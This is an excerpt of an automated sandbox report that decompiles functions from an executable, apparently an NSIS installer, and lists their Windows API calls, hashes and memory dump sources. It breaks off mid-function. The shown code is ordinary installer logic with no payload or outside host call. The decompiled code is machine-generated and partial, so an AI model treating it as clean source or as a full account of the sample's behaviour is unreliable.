                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                              • Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
                                              • Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                              • Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404FE7(0xffffffeb, _t13);
				_t15 = E0040555B(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060C3(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C59(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                              0x00401e21
                                              0x00401e26
                                              0x00401e2c
                                              0x00401e33
                                              0x00401e36
                                              0x00402672
                                              0x00401e3c
                                              0x00401e3f
                                              0x00401e50
                                              0x00401e4b
                                              0x00401e4b
                                              0x00401e65
                                              0x00401e6e
                                              0x00401e7e
                                              0x00401e80
                                              0x00401e80
                                              0x00401e70
                                              0x00401e74
                                              0x00401e74
                                              0x00401e6e
                                              0x00401e87
                                              0x00401e8a
                                              0x00401e8a
                                              0x004028a4
                                              0x004028b0

                                              APIs
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                • Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                • Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D
                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                              • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                              • String ID:
                                              • API String ID: 3521207402-0
                                              • Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                              • Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
                                              • Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                              • Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040365C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0040365C() {
				void* _t1;
				void* _t2;
				void* _t4;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E004036B9();
				_t4 = E00405620(_t7, _t12, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nsx95CD.tmp\\", 7); // executed
				return _t4;
			}








                                              0x0040365c
                                              0x0040366b
                                              0x0040366e
                                              0x00403670
                                              0x00403670
                                              0x00403677
                                              0x0040367f
                                              0x00403682
                                              0x00403684
                                              0x00403684
                                              0x00403684
                                              0x0040368b
                                              0x00403697
                                              0x0040369d

                                              APIs
                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\, xrefs: 00403692
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\
                                              • API String ID: 2962429428-3317108398
                                              • Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                              • Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
                                              • Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                              • Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423fb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42376c =  *0x42376c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
					}
				}
				return 0;
			}











                                              0x0040138a
                                              0x004013fa
                                              0x0040139b
                                              0x004013a0
                                              0x00000000
                                              0x00000000
                                              0x004013a2
                                              0x004013a3
                                              0x004013ad
                                              0x00000000
                                              0x00401404
                                              0x004013b0
                                              0x004013b7
                                              0x004013bd
                                              0x004013be
                                              0x004013c0
                                              0x004013c2
                                              0x004013b9
                                              0x004013b9
                                              0x004013ba
                                              0x004013ba
                                              0x004013c9
                                              0x004013cb
                                              0x004013f4
                                              0x004013f4
                                              0x004013c9
                                              0x00000000

                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                              • Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
                                              • Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                              • Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406087 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406087(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409248);
				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
				}
				_t5 = E0040601D(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                              0x0040608f
                                              0x00406092
                                              0x00406099
                                              0x004060a1
                                              0x004060ad
                                              0x00000000
                                              0x004060b4
                                              0x004060a4
                                              0x004060ab
                                              0x00000000
                                              0x004060bc
                                              0x00000000

                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                • Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
                                                • Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
                                                • Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                              • Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
                                              • Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                              • Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004059D2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 68%
                                              			E004059D2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                              0x004059d6
                                              0x004059e3
                                              0x004059f8
                                              0x004059fe

                                              APIs
                                              • GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\qHpeBvr9cR.exe,80000000,00000003), ref: 004059D6
                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                              • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                              • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                              • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405526 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405526(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                              0x0040552c
                                              0x00405534
                                              0x00000000
                                              0x0040553a
                                              0x00000000

                                              APIs
                                              • CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
                                              • GetLastError.KERNEL32 ref: 0040553A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                              • Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
                                              • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                              • Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004059B3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004059B3(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                                              0x004059b7
                                              0x004059c0
                                              0x004059c9
                                              0x00000000
                                              0x004059c9
                                              0x004059cf

                                              APIs
                                              • GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                              • Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
                                              • Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                              • Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004031D5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004031D5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                              0x004031d9
                                              0x004031ec
                                              0x004031f4
                                              0x00000000
                                              0x004031fb
                                              0x00000000
                                              0x004031fd

                                              APIs
                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413120,0040B120,004030DA,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                              • Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
                                              • Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                              • Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403207 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403207(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                              0x00403215
                                              0x0040321b

                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                              • Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
                                              • Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                              • Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00405125 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423764;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420580;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
